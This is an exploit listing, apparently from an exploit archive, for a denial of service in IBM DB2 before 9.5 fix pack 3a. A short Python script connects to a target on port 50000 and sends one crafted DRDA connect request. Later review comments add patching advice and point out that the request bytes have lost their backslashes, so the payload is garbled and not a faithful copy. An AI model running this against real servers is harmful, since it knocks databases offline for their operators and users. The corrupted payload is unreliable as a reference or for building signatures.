
# Title : IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit
# Published : 2009-04-03
# Author : Dennis Yurichev


# Discovered by Dennis Yurichev <dennis@conus.info>

# DB2TEST database should be present on target system

from sys import *
from socket import *

# Proof-of-concept for the denial of service named in the page title: one
# TCP connection, one fixed request, then close. Nothing is read back from
# the server.
#
# Per the title, the affected releases are IBM DB2 before 9.5 fix pack 3a.
# For defenders that means confirming the installed fix pack level and
# limiting which hosts can reach the DB2 listener port at all.
#
# NOTE(review): as rendered on this page the literal below is plain ASCII
# text ("x00xBE..."), not binary data, so this listing is not a
# byte-accurate copy of the original publication. Do not derive detection
# signatures from it without checking against the original advisory.
#
# NOTE(review): the leading values (D0 41 ... 10 41, later 10 6E) look like
# a DRDA EXCSAT exchange followed by ACCSEC, with EBCDIC-encoded names --
# an inference from the values shown; confirm against the DRDA reference.
connect_request = (
    "x00xBExD0x41x00x01x00xB8x10x41x00x7Fx11x5Ex97xA8"
    "xA3x88x96x95x4Bx85xA7x85x40x40x40x40x40x40x40x40"
    "x40x40xF0xF1xC3xF4xF0xF1xF1xF8xF0xF0xF0x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x60xF0xF0"
    "xF0xF1xD5xC1xD4xC5x40x40x40x40x40x40x40x40x40x40"
    "x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40"
    "xC4xC2xF2xE3xC5xE2xE3x40xF0xC4xC2xF2x40x40x40x40"
    "x40x40x40x40x40x40x40x40x40x00x18x14x04x14x03x00"
    "x07x24x07x00x09x14x74x00x05x24x0Fx00x08x14x40x00"
    "x08x00x0Bx11x47xD8xC4xC2xF2x61xD5xE3x00x06x11x6D"
    "xE7xD7x00x0Cx11x5AxE2xD8xD3xF0xF9xF0xF5xF0x00x4A"
    "xD0x01x00x02x00x44x10x6Ex00x06x11xA2x00x09x00x16"
    "x21x10xC4xC2xF2xE3xC5xE2xE3x40x40x40x40x40x40x40"
    "x40x40x40x40x00x24x11xDCx6FxC1x3BxD4x3Cx33xF8x0C"
    "xC9x96x6Ex6CxCDxB9x0Ax2Cx9CxECx49x2Ax1Ax4DxCEx62"
    "x47x9Dx37x88xA8x77x23x43"
)

db2_conn = socket(AF_INET, SOCK_STREAM)

# Host comes from the first command-line argument; the port is fixed at
# 50000 in the script.
db2_conn.connect((argv[1], 50000))

# Single send() call; its return value (bytes actually written) is ignored.
db2_conn.send(connect_request)

db2_conn.close()
